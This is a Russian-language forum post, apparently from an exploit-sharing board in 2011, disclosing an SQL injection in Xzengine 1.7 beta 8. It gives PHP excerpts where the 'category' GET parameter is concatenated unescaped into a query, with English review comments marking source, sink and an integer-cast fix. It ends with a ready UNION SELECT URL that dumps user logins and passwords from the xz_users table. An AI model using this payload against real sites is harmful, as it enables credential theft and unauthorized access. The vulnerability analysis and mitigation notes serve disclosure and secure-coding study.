
10.01.2011, 20:08
Дополнение к посту ~d0s~(#444):
Xzengine 1.7 beta 8
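SQL injection (значение параметра category из $_GET попадает в SQL-запрос без приведения типа и без экранирования):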
/index.php
PHP код:
...
require_once'./classes/viewnews.php';
...
// Taint source: the raw 'category' query-string value is copied into $category.
// No integer cast, allow-list check or escaping is visible in this excerpt.
// NOTE(review): the query-building listing on this page presumably reads this
// variable from the including scope (see the require_once above) — confirm
// against the full file.
if(isset($_GET['category']))
$category=$_GET['category'];
...
/viewnews.php
PHP код:
...
// `==` is a loose comparison, not input validation: every value of $category
// that does not compare equal to 0 takes the else branch below.
if($category==0)
// No category filter: list approved, visible, non-fixed news, newest first.
// NOTE(review): $newsperpage and $page are concatenated into LIMIT in both
// branches; their origin is not shown here — verify that they are integers.
{$result=AbstractDataBase::Instance()->query('SELECT * FROM '.DATABASE_TBLPERFIX.'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 ORDER BY news_id DESC LIMIT '.$newsperpage*$page.','.$newsperpage);
}
else
// Injection sink: $category is concatenated into the statement unquoted, so its
// content is parsed as SQL text rather than treated as a value.
// Mitigation: cast to an integer before building the query
// (e.g. $category=(int)$category;) or pass it as a bound parameter if the
// database wrapper offers one (its API is not shown in this excerpt).
{$result=AbstractDataBase::Instance()->query('SELECT * FROM '.DATABASE_TBLPERFIX.'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 AND news_category = '.$category.' ORDER BY news_id DESC LIMIT '.$newsperpage*$page.','.$newsperpage);
}
...
Пример:
Код:
http://eng/index.php?category=3%20union%20select%20concat_ws(0x3a,users_login,users_password),2,3,4,5,6,7,8,9,10,11,12,13%20from%20xz_users%20limit%200,1--